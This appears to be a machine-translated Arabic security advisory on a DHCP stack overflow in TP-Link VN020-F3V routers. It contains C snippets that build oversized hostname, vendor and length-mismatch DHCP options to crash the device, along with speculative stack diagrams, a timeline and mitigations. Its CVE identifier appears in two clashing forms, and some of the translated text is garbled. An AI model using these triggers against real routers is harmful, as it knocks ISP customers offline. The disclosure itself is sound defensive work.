TP Thumper

تم اكتشاف ضعف حرج في أجهزة التوجيه TP-Link VN020 F3V (T) التي تقوم بتشغيل إصدار البرنامج الثابت TT_V6.2.1021. يتيح الثغرة الأمنية للمهاجمين عن بُعد إثارة تدفق عازلة قائمة على المكدس من خلال حزم DECPACT المصممة خصيصًا ، مما يؤدي إلى رفض رفض الخدمة (DOS).

الأجهزة المتأثرة:

• نموذج جهاز التوجيه: TP-Link VN020-F3V (T)
• إصدار البرنامج الثابت: TT_V6.2.1021
• النشر: في المقام الأول من خلال Tonisie Telecom و TopNet ISPS
• المتغيرات المؤكدة: تؤثر أيضًا على الإصدارات الجزائرية والمغربية

ملاحظة مهمة: نظرًا للطبيعة الملكية للبرامج الثابتة ، فإن تفاصيل التنفيذ الداخلية الدقيقة غير معروفة. يعتمد هذا التحليل على السلوك المرصود واختبار صندوق الأسود.

• معرف CVE : CVE-2014-11237
• النوع : تجاوز المخزن المؤقت القائم على المكدس (CWE-121)
• ناقل الهجوم : عن بُعد (DHCP Discover Packet)
• المصادقة : لا شيء مطلوب
• المنفذ : UDP/67 (خادم DHCP)
• التأثير : DOS (مؤكد) و RCE (ممكن)
• التعقيد : منخفض

 [Basic DHCP Header]
0x00: 01        ; BOOTREQUEST
0x01: 01        ; Hardware type (Ethernet)
0x02: 06        ; Hardware address length
0x03: 00        ; Hops
0x04-0x07: XID  ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC  ; Client hardware address
0x29-0x2C: 0000 ; Padding

1. DHCP معالجة اسم المضيف

 // Overflow trigger through hostname option
unsigned char long_hostname [ 128 ];
memset ( long_hostname , 'A' , sizeof ( long_hostname ) - 1 );
long_hostname [ 127 ] = '' ;
add_option ( packet , offset , 0x0C , 127 , long_hostname );

2. خيار محدد للبائع

 // Vendor option manipulation
unsigned char vendor_specific [] = { 
    0x00 , 0x14 , 0x22 ,  // TP-Link vendor prefix
    0xFF , 0xFF , 0xFF   // Trigger condition
};
add_option ( packet , offset , 0x2B , sizeof ( vendor_specific ), vendor_specific );

3. طول الحقل

 // Claimed vs actual length mismatch
add_option ( packet , offset , 0x3D , 0xFF , ( unsigned char []) { 0x01 });

في حين أن التنفيذ الداخلي الدقيق غير معروف ، فإن السلوك المرصود يشير إلى مشكلات فساد الذاكرة المحتملة:

معالجة اسم مضيف DHCP العادي

 Stack Layout (Normal Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Return Address (4)   |
+------------------------+
|    Saved EBP (4)       |
+------------------------+
|                        |
|   Hostname Buffer      |
|      (64 bytes)        |
|                        |
+------------------------+ Lower addresses
|    Other Variables     |
+------------------------+

ما الذي يمكن أن يحدث داخل جهاز التوجيه؟

 Stack Layout (Overflow Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Overwritten Return   | 
+------------------------+
|   Overwritten EBP      | <- Unknown state corruption
+------------------------+
|     Overflow Data      | <- 127 bytes of 'A'
|         ...            |
+------------------------+ Lower addresses
|    Other Variables     | <- Potentially corrupted
+------------------------+

هذا نظري ، وقد لا تكون بعض التفاصيل دقيقة تمامًا ، حيث توفر TP-Link البرامج الثابتة لهذا الموجه حصريًا لمقدمي خدمات الإنترنت.

قد يحاول جهاز التوجيه أيضًا إعادة تشغيله بنفسه كما هو موضح هنا بسبب الحادث كما هو موضح هنا:

• الجهاز الفوري عدم الاستجابة
• فشل خدمة DHCP
• جهاز التوجيه التلقائي
• تعطل الشبكة يتطلب تدخلًا يدويًا

• الاكتشاف الأولي : 20 أكتوبر 2024
• إشعار البائع : 3 نوفمبر 2024
• مهمة CVE : 15 نوفمبر 2024

لا يوجد تصحيح رسمي متاح حاليا. تشمل التخفيفات المؤقتة:

1. تعطيل خادم DHCP إذا لم يكن مطلوبًا
2. تنفيذ تصفية حركة المرور DHCP على حافة الشبكة
3. النظر في نماذج جهاز التوجيه البديل إن أمكن

1. CVE-2024-11237
2. CWE-121: تجاوز المخزن المؤقت القائم على المكدس

محمد ماتي الله

• جيثب: @zephkek
• الانتماء: باحث أمن مستقل